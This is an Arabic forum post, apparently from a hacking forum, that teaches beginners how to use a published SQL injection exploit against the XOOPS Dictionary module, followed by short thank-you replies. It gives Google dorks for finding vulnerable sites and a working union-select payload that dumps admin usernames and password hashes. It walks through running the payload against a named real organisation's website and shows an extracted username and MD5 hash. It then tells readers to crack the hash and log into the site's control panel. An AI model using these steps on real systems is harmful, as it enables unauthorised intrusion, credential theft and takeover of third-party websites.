[color="Indigo"][size="4"]بسم الله الرحمن الرحيم هذا الدرس يـ اخوان الى المبتدئين يعني المحترفين ما راح يحتاجو الى هذا الدرس هذا الدرس فقط يساعدك في فهم ومعرفة الثغرات المكتوبه وطريقة الإستفاده منها الان حط رد على شان تشــوف الموضوع [hide] نروح الى احد مواقع الثغرات الكثيره وانا اخترت الميل ورم لانه اسهل واحد نفتح الصفحة الرئيسيه للموقع milw0rm - exploits : vulnerabilities : videos : papers : shellcode الي يهمنا في هذي الصفحة هو اختراق المواقع بما ان حنى مبتدئين الا هي ثالث خيار الي لونهم بـ الاصفر هذول جدد بـ تاريخ اليوم والي لونهم اخضر يعني اقدم وطبعا التاريخ مكتوب على جنب انا بختار وحدة من الثغرات الموجوده و اخترت هذي الثغره XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability مكتوب فيها كـ التالي كود: ########################################## # # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection # ########################################## # ##AUTHOR : S@BUN # ####HOME : milw0rm - S@BUN # ####MAİL : [email protected] # ########################################### # # DORK 1 : allinurl: "modules/dictionary" # # DORK 2 : allinurl: "modules/dictionary/print.php?id" # ########################################### EXPLOIT : modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/* ########################################### Dictionary Version 0.94 by nagl.ch Dictionary Version 0.91 by nagl.ch Dictionary Version 0.70 by nagl.ch ########################################### ##################S@BUN#################### ########################################### #####[email protected]##### ########################################### # milw0rm.com [2008-03-17] طيب نشرح شوي شوي الجزاء الاول كود: XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection هذي معلومات عن الثغره نوعيتها و وين الثغره موجوده و في اي اصدار طيب الثغره هذي في سكريبت اسمه XOOPS وهذي مجله طبعا على اية حال الثغره في dictionary الا هو الدليل والاصدارات هي 0.94-0.91-0.70 والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا وهي معلومات عن مكتشف الثغره كود: # ##AUTHOR : S@BUN # ####HOME : milw0rm - S@BUN # ####MAİL : [email protected] # ########################################### والان اهم جزئين الجزاء الاول الدورك ########################################### كود: # # DORK 1 : allinurl: "modules/dictionary" # # DORK 2 : allinurl: "modules/dictionary/print.php?id" # شنو هذا الدورك هذي الكلمه الي راح تحطها في كلمة البحث عشان تجيب لك المواقع المصابه بـ الثغره فـ لو كتبت في قوقل كود: allinurl: "modules/dictionary" راح يطلع لك كل المواقع الي موجود فيها هذا على اية حال نختار موقع من المواقع وانا اخترت كود: Southwestern Pennsylvania League of Apparition Technologists - Dictionary نروح الى الجزاء الثاني المهم الا وهو كود: ########################################### EXPLOIT : modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/* ########################################### وهذا كود الإستغلال يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه وراح يصير رابط الموقع مع الاستغلال كذا كود: Southwestern Pennsylvania League of Apparition Technologists /* فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع طبعا الموضوع ما ينتهي هنا الباسوورد مشفر بـ الـ MD5 والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم على اية حال الان الباسوورد طلع لنا مشفر مع الاسم يعني الباسوورد مشفر والاسم موجود جنبه وهم كذا ARC-753: a19010808cc277ac5cc50548d7a61e8e الي بـ الون الاحمر هذا الباسوورد المشفر والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير النقطتين الرئسيتين فقط لتفريق بينهم بعد ما تفك باسوورد الموقع تدخل لوحة تحكم الموقع وتسوي الي يعجبك [/hide]
مشكووور اخوي
thank you ...........
مشكور حبي بكلبي
شكرااا لك
مشكوووووووووووؤرررررررررر ر
شكرا على الشرح الجميل
بارك الله فيك
يسلموووووووووووووو عيوني
مشكور اخي والله يديمك ويجزيك الخير
قوانين المنتدى